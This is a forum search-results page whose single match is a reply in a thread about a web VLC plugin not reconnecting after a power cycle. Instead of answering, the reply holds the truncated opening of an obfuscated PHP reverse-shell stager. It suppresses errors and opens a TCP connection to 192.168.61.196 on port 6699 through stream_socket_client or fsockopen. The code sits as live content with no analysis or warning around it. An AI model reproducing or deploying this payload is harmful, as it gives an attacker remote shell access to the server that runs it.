Search found 1 match

Go to advanced search

by anynameuser
07 Jun 2018 12:00
Forum: Web and scripting
Topic: Web VLC Plugin Can not re-connect when power cycle
Replies: 9
Views: 3054

Re: Web VLC Plugin Can not re-connect when power cycle

<?php /*<?php /**/ error_reporting(0); $ip = '192.168.61.196'; $port = 6699; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ty...

Go to advanced search